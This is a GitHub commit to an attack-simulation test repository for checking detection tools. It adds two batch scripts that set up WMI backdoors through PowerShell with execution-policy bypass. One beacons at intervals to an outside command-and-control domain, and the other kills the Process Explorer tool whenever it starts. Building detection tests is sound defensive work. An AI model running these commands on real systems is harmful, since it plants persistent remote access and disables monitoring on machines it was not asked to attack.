Two new WMI backdoor tests (by Will Graeber @mattifestation)

https://github.com/mattifestation/WMI_Backdoor/
NextronSystems · Feb 22, 2018 · 48db052 · 48db052
1 parent ed50272
commit 48db052
Show file tree

Hide file tree

Showing 4 changed files with 618 additions and 0 deletions.
diff --git a/README.md b/README.md
@@ -81,6 +81,7 @@ The following table shows the different test cases and the expected detection re
 | DNS Cache 1 (Cache Injection)         | (X) | X    |     | X   | X   |
 | Malicious User Agents (Malware, RATs) |     | X    | X   | X   |     |
 | Ncat Back Connect (Drop & Exec)       | X   |      | X   | X   | X   |
+| WMI Backdoor C2                       |     |      | X   | X   | X   |
 | LSASS Dump (with Procdump)            |     |      | X   | X   | X   |
 | Mimikatz 1 (Drop & Exec)              | X   |      | X   | X   | X   |
 | WCE 1 (Eventlog entries)              |     |      | X   | X   | X   |
@@ -98,6 +99,7 @@ The following table shows the different test cases and the expected detection re
 | Scheduled Task Creation               |     |      | X   | X   | X   |
 | StickyKey Backdoor                    |     |      | X   |     | X   |
 | Web Shells                            | X   |      | (X) |     | X   |
+| WMI Backdoor                          |     |      | X   |     | X   |
 
 # Test Sets
 
@@ -126,6 +128,10 @@ The following table shows the different test cases and the expected detection re
 
 - Drops a PowerShell Ncat alternative to the working directory and runs it to back connect to a well-known attacker domain
 
+### WMI Backdoor
+
+- Using Matt Graeber's [WMIBackdoor](https://github.com/mattifestation/WMI_Backdoor/) to kill local procexp64.exe when it starts
+
 ## Credential Access
 
 ### LSASS DUMP
@@ -220,6 +226,10 @@ No test cases yet
 - Drops standard web shells to that diretory
 - Drops GIF obfuscated web shell to that diretory
 
+### WMI Backdoor
+
+- Using Matt Graeber's [WMIBackdoor](https://github.com/mattifestation/WMI_Backdoor/) to kill local procexp64.exe when it starts
+
 # Warning
 
 This repo contains tools and executables that can harm your system's integrity and stability. Do only use them on non-productive test or demo systems.

diff --git a/test-sets/command-and-control/wmi-backdoor-c2.bat b/test-sets/command-and-control/wmi-backdoor-c2.bat
@@ -0,0 +1,11 @@
+@ECHO OFF
+
+ECHO ===========================================================================
+ECHO WMI Backdoor C2
+ECHO.
+ECHO Using Matt Graeber's WMIBackdoor to contact a C2 in certain intervals
+ping -n 5 127.0.0.1 > NUL
+
+"%ZIP%" e -p%PASS% %TOOLARCH% -aoa -o"%APTDIR%" toolset\WMIBackdoor.ps1 > NUL
+
+powershell.exe -Exec ByPasS ". %APTDIR%\WMIBackdoor.ps1;$Trigger2=New-WMIBackdoorTrigger -TimingInterval 60;$Action2=New-WMIBackdoorAction -C2Uri 'http://googleaccountsservices.com' -Backdoor; $Registration2=Register-WMIBackdoor -Trigger $Trigger2 -Action $Action2"
diff --git a/test-sets/persistence/wmi-backdoor.bat b/test-sets/persistence/wmi-backdoor.bat
@@ -0,0 +1,11 @@
+@ECHO OFF
+
+ECHO ===========================================================================
+ECHO WMI Backdoor
+ECHO.
+ECHO Using Matt Graeber's WMIBackdoor to kill local procexp64.exe when it starts
+ping -n 5 127.0.0.1 > NUL
+
+"%ZIP%" e -p%PASS% %TOOLARCH% -aoa -o"%APTDIR%" toolset\WMIBackdoor.ps1 > NUL
+
+powershell.exe -Exec ByPasS ". %APTDIR%\WMIBackdoor.ps1;$Trigger1=New-WMIBackdoorTrigger -ProcessName 'procexp64.exe';$Action1=New-WMIBackdoorAction -KillProcess; $Registration1=Register-WMIBackdoor -Trigger $Trigger1 -Action $Action1"